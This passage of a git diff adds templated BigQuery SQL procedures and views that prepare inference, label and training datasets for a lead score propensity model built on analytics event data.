user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_name, + LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_source, + LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_medium, + LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_name, + LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_source, + LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS has_signed_in_with_user_id{% for feature in short_list_features %}, + LAST_VALUE({{feature.feature_name}}_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_1_day, + LAST_VALUE({{feature.feature_name}}_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_2_day, + LAST_VALUE({{feature.feature_name}}_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_3_day, + LAST_VALUE({{feature.feature_name}}_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_4_day, + LAST_VALUE({{feature.feature_name}}_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_5_day{% endfor %} + FROM `{{project_id}}.{{dataset}}.{{insert_table}}` +); + + +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_inference_5_1` +(processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), + friendly_name="v_lead_score_propensity_inference_5_1", + description="View Lead Score Propensity Inference dataset using 5 days back to predict 1 day ahead. View expires after 48h and should run daily.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +FROM ( +SELECT DISTINCT + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + -- Row number partitioned by user pseudo id ordered by feature date descending + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_inference_5_1` +) +WHERE + -- Filter only for the most recent user example + user_row_order = 1; + diff --git a/sql/procedure/lead_score_propensity_label.sqlx b/sql/procedure/lead_score_propensity_label.sqlx new file mode 100644 index 00000000..fc27c071 --- /dev/null +++ b/sql/procedure/lead_score_propensity_label.sqlx @@ -0,0 +1,102 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- Run these windows aggregations every day. For each date in training and inference date ranges. +-- Setting procedure to lookback from the day before `input_date` until the day before `end_date` +SET input_date = DATE_SUB(input_date, INTERVAL 1 DAY); +SET end_date = DATE_SUB(end_date, INTERVAL 1 DAY); + +-- Future User metrics: 1-day future {{target_event}}s per user +CREATE OR REPLACE TEMP TABLE future_{{target_event}}s_per_user AS ( + SELECT + -- User's unique identifier + user_pseudo_id, + -- The date for which future {{target_event}}s are being calculated + input_date as event_date, + -- Calculates the maximum count of distinct events for users who made a {{target_event}}s 1 day after `input_date` + MAX(COUNT(DISTINCT CASE DATE_DIFF(event_date, input_date, DAY) = 1 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON E.device_type_id = D.device_type_id + -- Filters events to be within the date range defined by input_date and end_date from dates_interval + WHERE event_date BETWEEN input_date AND end_date + -- Filter event with event name {{target_event}} + AND LOWER(E.event_name) IN ('{{target_event}}') + AND E.ga_session_id IS NOT NULL + AND D.device_os IS NOT NULL + -- Grouping by user pseudo ids + GROUP BY user_pseudo_id +); + +-- All users in the platform +CREATE OR REPLACE TEMP TABLE all_users_possible_{{target_event}}s as ( + SELECT DISTINCT + -- User's unique identifier + Users.user_pseudo_id, + -- The event date for which {{target_event}}s are being considered + Days.event_date as event_date, + -- Placeholder columns for {{target_event}} counts in future days + NULL as {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + CROSS JOIN + -- Generates a list of dates for the current date (`input_date`) + (SELECT event_date FROM UNNEST(GENERATE_DATE_ARRAY(input_date, end_date, INTERVAL 1 DAY)) AS event_date) Days + WHERE Days.event_date = input_date + -- Filter event with valid sessions + AND Users.ga_session_id IS NOT NULL +); + + +CREATE OR REPLACE TEMP TABLE DataForTargetTable AS +SELECT DISTINCT + -- Timestamp when the data was processed + CURRENT_TIMESTAMP() AS processed_timestamp, + -- The date for which {{target_event}}s are being considered + A.event_date as feature_date, + -- User's unique identifier + A.user_pseudo_id, + -- The maximum of 0 and the {{target_event}} count for day 1 (if it exists) + LEAST(COALESCE(B.{{target_event}}_day_1, 0), 1) AS {{target_event}}_day_1 +FROM all_users_possible_{{target_event}}s AS A +LEFT JOIN future_{{target_event}}s_per_user AS B +ON B.user_pseudo_id = A.user_pseudo_id +; + +-- Updates or inserts data into the target table +MERGE `{{project_id}}.{{dataset}}.{{insert_table}}` I +USING DataForTargetTable T +ON I.feature_date = T.feature_date + AND I.user_pseudo_id = T.user_pseudo_id +WHEN MATCHED THEN + -- Updates existing records + UPDATE SET + -- Updates the processed timestamp + I.processed_timestamp = T.processed_timestamp, + -- Updates {{target_event}} counts for each day + I.{{target_event}}_day_1 = T.{{target_event}}_day_1 +WHEN NOT MATCHED THEN + -- Inserts new records + INSERT + (processed_timestamp, + feature_date, + user_pseudo_id, + {{target_event}}_day_1) + VALUES + (T.processed_timestamp, + T.feature_date, + T.user_pseudo_id, + T.{{target_event}}_day_1) +; + +SET rows_added = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{project_id}}.{{dataset}}.{{insert_table}}`); diff --git a/sql/procedure/lead_score_propensity_training_preparation.sqlx b/sql/procedure/lead_score_propensity_training_preparation.sqlx new file mode 100644 index 00000000..5d0f61e3 --- /dev/null +++ b/sql/procedure/lead_score_propensity_training_preparation.sqlx @@ -0,0 +1,569 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +DECLARE custom_start_date DATE DEFAULT NULL; +DECLARE custom_end_date DATE DEFAULT NULL; + +-- custom_start_date: The start date of the data to be used for training. +-- custom_end_date: The end date of the data to be used for training. +SET custom_start_date = PARSE_DATE("%Y-%m-%d", {{custom_start_date}}); +SET custom_end_date = PARSE_DATE("%Y-%m-%d", {{custom_end_date}}); + +-- The procedure first checks if the custom_start_date and custom_end_date parameters are valid. +-- If either parameter is not valid, the procedure sets the corresponding date to the maximum or +-- minimum date of the available data. +IF custom_start_date IS NOT NULL AND custom_start_date >= start_date AND custom_start_date <= end_date + AND custom_start_date < custom_end_date THEN + SET start_date = custom_start_date; +END IF; + +IF custom_end_date IS NOT NULL AND custom_end_date <= end_date AND custom_end_date >= start_date + AND custom_end_date > custom_start_date THEN + SET end_date = custom_end_date; +END IF; + +-- This is a temp table consolidating user_dimensions over the dates intervals. +CREATE OR REPLACE TEMP TABLE training_preparation_ud as ( + SELECT DISTINCT + -- The user pseudo id + UD.user_pseudo_id, + -- The user id + MAX(UD.user_id) OVER(user_dimensions_window) AS user_id, + -- The feature date + UD.feature_date, + -- The user lifetime value revenue + MAX(UD.user_ltv_revenue) OVER(user_dimensions_window) AS user_ltv_revenue, + -- The device category + MAX(UD.device_category) OVER(user_dimensions_window) AS device_category, + -- The device brand name + MAX(UD.device_mobile_brand_name) OVER(user_dimensions_window) AS device_mobile_brand_name, + -- The device model name + MAX(UD.device_mobile_model_name) OVER(user_dimensions_window) AS device_mobile_model_name, + -- The device operating system + MAX(UD.device_os) OVER(user_dimensions_window) AS device_os, + -- The device language + MAX(UD.device_language) OVER(user_dimensions_window) AS device_language, + -- The device web browser + MAX(UD.device_web_browser) OVER(user_dimensions_window) AS device_web_browser, + -- The user sub continent + MAX(UD.geo_sub_continent) OVER(user_dimensions_window) AS geo_sub_continent, + -- The user country + MAX(UD.geo_country) OVER(user_dimensions_window) AS geo_country, + -- The user region + MAX(UD.geo_region) OVER(user_dimensions_window) AS geo_region, + -- The user city + MAX(UD.geo_city) OVER(user_dimensions_window) AS geo_city, + -- The user metro + MAX(UD.geo_metro) OVER(user_dimensions_window) AS geo_metro, + -- The user last traffic source medium + MAX(UD.last_traffic_source_medium) OVER(user_dimensions_window) AS last_traffic_source_medium, + -- The user last traffic source name + MAX(UD.last_traffic_source_name) OVER(user_dimensions_window) AS last_traffic_source_name, + -- The user last traffic source source + MAX(UD.last_traffic_source_source) OVER(user_dimensions_window) AS last_traffic_source_source, + -- The user first traffic source medium + MAX(UD.first_traffic_source_medium) OVER(user_dimensions_window) AS first_traffic_source_medium, + -- The user first traffic source name + MAX(UD.first_traffic_source_name) OVER(user_dimensions_window) AS first_traffic_source_name, + -- The user first traffic source source + MAX(UD.first_traffic_source_source) OVER(user_dimensions_window) AS first_traffic_source_source, + -- Whether the user has signed in with user ID + MAX(UD.has_signed_in_with_user_id) OVER(user_dimensions_window) AS has_signed_in_with_user_id, +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_dimensions` UD +WHERE + -- Filter feature dates according to the defined date interval + UD.feature_date BETWEEN start_date AND end_date +WINDOW + user_dimensions_window AS (PARTITION BY UD.user_pseudo_id, UD.feature_date ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating user rolling metrics over the dates intervals. +CREATE OR REPLACE TEMP TABLE training_preparation_uwlm as ( + SELECT DISTINCT + -- User pseudo id + UWLM.user_pseudo_id, + -- Feature date + UWLM.feature_date{% for feature in short_list_features %}, + -- Calculate the maximum value for each metric over the window + MAX(UWLM.{{feature.feature_name}}_past_1_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_1_day, + MAX(UWLM.{{feature.feature_name}}_past_2_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_2_day, + MAX(UWLM.{{feature.feature_name}}_past_3_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_3_day, + MAX(UWLM.{{feature.feature_name}}_past_4_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_4_day, + MAX(UWLM.{{feature.feature_name}}_past_5_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_5_day{% endfor %} +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_rolling_window_lead_metrics` UWLM +WHERE + -- In the future consider `feature_date BETWEEN start_date AND end_date`, to process multiple days. Modify Partition BY + UWLM.feature_date BETWEEN start_date AND end_date +WINDOW + user_rolling_lead_window AS (PARTITION BY UWLM.user_pseudo_id, UWLM.feature_date ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating user labels over the dates intervals. +CREATE OR REPLACE TEMP TABLE training_preparation_label as ( + SELECT DISTINCT + LABEL.user_pseudo_id, -- The unique identifier for the user. + LABEL.feature_date, -- The date for which the features are extracted. + MAX(LABEL.{{target_event}}_day_1) OVER(lead_score_propensity_label_window) AS {{target_event}}_day_1, -- Whether the user made a {{target_event}} on day 1. +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.lead_score_propensity_label` LABEL +WHERE + -- Define the training subset interval + LABEL.feature_date BETWEEN start_date AND end_date +WINDOW + lead_score_propensity_label_window AS (PARTITION BY LABEL.user_pseudo_id, LABEL.feature_date ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating all features and labels over the dates intervals. +CREATE OR REPLACE TEMP TABLE training_preparation as ( + SELECT DISTINCT + UD.user_pseudo_id, + UD.user_id, + UD.feature_date, + COALESCE(UD.user_ltv_revenue, 0.0) AS user_ltv_revenue, + UD.device_category, + UD.device_mobile_brand_name, + UD.device_mobile_model_name, + UD.device_os, + UD.device_language, + UD.device_web_browser, + UD.geo_sub_continent, + UD.geo_country, + UD.geo_region, + UD.geo_city, + UD.geo_metro, + UD.last_traffic_source_medium, + UD.last_traffic_source_name, + UD.last_traffic_source_source, + UD.first_traffic_source_medium, + UD.first_traffic_source_name, + UD.first_traffic_source_source, + UD.has_signed_in_with_user_id,{% for feature in short_list_features %} + UWLM.{{feature.feature_name}}_past_1_day, + UWLM.{{feature.feature_name}}_past_2_day, + UWLM.{{feature.feature_name}}_past_3_day, + UWLM.{{feature.feature_name}}_past_4_day, + UWLM.{{feature.feature_name}}_past_5_day,{% endfor %} + LABEL.{{target_event}}_day_1 +FROM + training_preparation_ud UD +INNER JOIN + training_preparation_uwlm UWLM +ON + UWLM.user_pseudo_id = UD.user_pseudo_id + AND UWLM.feature_date = UD.feature_date +INNER JOIN + training_preparation_label LABEL +ON + LABEL.user_pseudo_id = UD.user_pseudo_id + AND LABEL.feature_date = UD.feature_date +); + +-- This is a temp table split the rows in each different data_split (TRAIN, VALIDATE, TEST) split +CREATE OR REPLACE TEMP TABLE DataForTargetTable AS( + SELECT DISTINCT + CASE + WHEN (ABS(MOD(FARM_FINGERPRINT(user_pseudo_id), 10)) BETWEEN 0 AND train_split_end_number) THEN "TRAIN" + WHEN (ABS(MOD(FARM_FINGERPRINT(user_pseudo_id), 10)) BETWEEN train_split_end_number AND validation_split_end_number) THEN "VALIDATE" + WHEN (ABS(MOD(FARM_FINGERPRINT(user_pseudo_id), 10)) BETWEEN validation_split_end_number AND 9) THEN "TEST" + END as data_split, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + {{target_event}}_day_1 + FROM training_preparation); + +CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.lead_score_propensity_training_full_dataset` AS +SELECT DISTINCT * FROM DataForTargetTable +WHERE data_split IS NOT NULL; + + +-- This is a table preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day. +CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` AS( + SELECT DISTINCT + CURRENT_TIMESTAMP() AS processed_timestamp, + data_split, + feature_date, + user_pseudo_id, + LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, + LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_ltv_revenue, + LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, + LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, + LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, + LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, + LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, + LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, + LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, + LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, + LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, + LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, + LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, + LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, + LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, + LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, + LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, + LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, + LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, + LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id,{% for feature in short_list_features %} + LAST_VALUE({{feature.feature_name}}_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_1_day, + LAST_VALUE({{feature.feature_name}}_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_2_day, + LAST_VALUE({{feature.feature_name}}_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_3_day, + LAST_VALUE({{feature.feature_name}}_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_4_day, + LAST_VALUE({{feature.feature_name}}_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_5_day,{% endfor %} + -- Calculate the will {{target_event}} label. + -- Label for a lead score propensity model. It indicates whether a user made a lead score within the next 30 days based on their lead score history. + -- This label is then used to train a model that can predict the likelihood of future {{target_event}}s for other users. + LAST_VALUE(CASE WHEN ({{target_event}}_day_1) = 0 THEN 0 ELSE 1 END) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) as will_{{target_event}} + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_full_dataset` +); + + +-- This is a view preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 days. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1` +(processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_lead_score_propensity_training_5_1", + description="View Lead Score Propensity Training dataset using 5 days back to predict 1 day ahead. View expires after 48h and should run daily.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + * EXCEPT(feature_date, row_order_peruser_persplit) +FROM ( +SELECT DISTINCT + processed_timestamp, + user_pseudo_id, + data_split, + feature_date, + -- Now, I want to skip rows per user, per split every 1 day. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_{{target_event}} ORDER BY feature_date ASC) AS row_order_peruser_persplit, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}} +FROM( +SELECT DISTINCT + processed_timestamp, + data_split, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}, + -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_{{target_event}} ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` +) +WHERE + row_order_peruser_perday_persplit = 1 +) +WHERE + --Skipping windows of 5 days, which is the past window size. + MOD(row_order_peruser_persplit-1, 5) = 0; + + +-- This is a view preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day. +-- This specifically filter rows which are most recent for each user. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1_last_window` +(processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_lead_score_propensity_training_5_1_last_window", + description="View Lead Score Propensity Training dataset using 5 days back to predict 1 day ahead.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}} +FROM( +SELECT DISTINCT + processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}, + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_{{target_event}} ORDER BY feature_date DESC) AS user_row_order + --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` +) +WHERE + user_row_order = 1; + + +-- This is a view preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day. +-- This is to be used in case recently no {{target_event}}s are registered, and you don't have a way to train the classification model. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1_rare_{{target_event}}s` +(processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_lead_score_propensity_training_5_1_rare_{{target_event}}s", + description="View Lead Score Propensity Training dataset using 5 days back to predict 1 day ahead.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}} + FROM + (SELECT DISTINCT + * + FROM `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1_last_window` + ) + UNION ALL + ( + SELECT DISTINCT + * EXCEPT(user_row_order, feature_date) + FROM( + SELECT DISTINCT + *, + ROW_NUMBER() OVER (PARTITION 